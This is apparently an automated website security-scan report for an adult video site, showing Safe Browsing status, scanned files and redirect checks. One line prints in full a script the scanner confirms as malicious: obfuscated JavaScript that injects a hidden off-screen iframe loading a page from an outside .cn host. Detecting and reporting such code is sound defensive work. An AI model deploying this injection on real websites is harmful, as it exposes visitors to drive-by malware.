Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pornolimon.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://pornolimon.net/ | 200 OK Content-Length: 166650 Content-Type: text/html | clean |
http://googleleadservices.cn/statistics1.js | 200 OK Content-Length: 398 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://googlestats.cn/default.html'); _q.style.position = 'absolute'; _q.style.width = '16px'; _q[_n]('frameborder', navigator.userAgent.indexOf('f0a7a142b755172da72ff74a1ac25199') + 1); _q.style.left = '-5597px'; document.write('<div id=\'__dr11938\'></div>'); document.getElementById('__dr11938').appendChild(_q); Antivirus reports:
| ||
http://pornolimon.net/engine/classes/js/jquery.js | 200 OK Content-Length: 93637 Content-Type: application/x-javascript | clean |
http://pornolimon.net/engine/classes/js/jqueryui.js | 200 OK Content-Length: 64860 Content-Type: application/x-javascript | clean |
http://pornolimon.net/engine/classes/js/dle_js.js | 200 OK Content-Length: 25071 Content-Type: application/x-javascript | clean |
http://pornolimon.net/tubes/js/animate.js | 200 OK Content-Length: 17999 Content-Type: application/x-javascript | clean |
http://wikipedia-org.cn/click.js | 200 OK Content-Length: 12803 Content-Type: text/javascript | clean |
http://pornolimon.net/anal/ | 200 OK Content-Length: 81270 Content-Type: text/html | clean |
http://pornolimon.net/bolshoy-chlen/ | 200 OK Content-Length: 147922 Content-Type: text/html | clean |
http://pornolimon.net/gruppovoy-seks/ | 200 OK Content-Length: 61672 Content-Type: text/html | clean |
http://pornolimon.net/domashnee-porno/ | 200 OK Content-Length: 155221 Content-Type: text/html | clean |
http://pornolimon.net/dominirovanie/ | 200 OK Content-Length: 75627 Content-Type: text/html | clean |
http://pornolimon.net/zhestkoe-porno/ | 200 OK Content-Length: 128532 Content-Type: text/html | clean |
http://pornolimon.net/zadnicy/ | 200 OK Content-Length: 25725 Content-Type: text/html | clean |
http://pornolimon.net/zrelye-damy/ | 200 OK Content-Length: 61499 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pornolimon.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 08 Jan 2015 16:06:07 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1oas4gf99jfjg8r7hr269ds7p7; path=/; domain=.pornolimon.net; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
Set-Cookie: dle_password=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
Set-Cookie: dle_hash=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: pornolimon.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 08 Jan 2015 16:06:07 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1oas4gf99jfjg8r7hr269ds7p7; path=/; domain=.pornolimon.net; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
Set-Cookie: dle_password=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
Set-Cookie: dle_hash=deleted; expires=Wed, 08-Jan-2014 16:06:06 GMT; path=/; domain=.pornolimon.net; httponly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: pornolimon.net
Referer: http://www.google.com/search?q=pornolimon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pornolimon.net
Referer: http://www.google.com/search?q=pornolimon.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
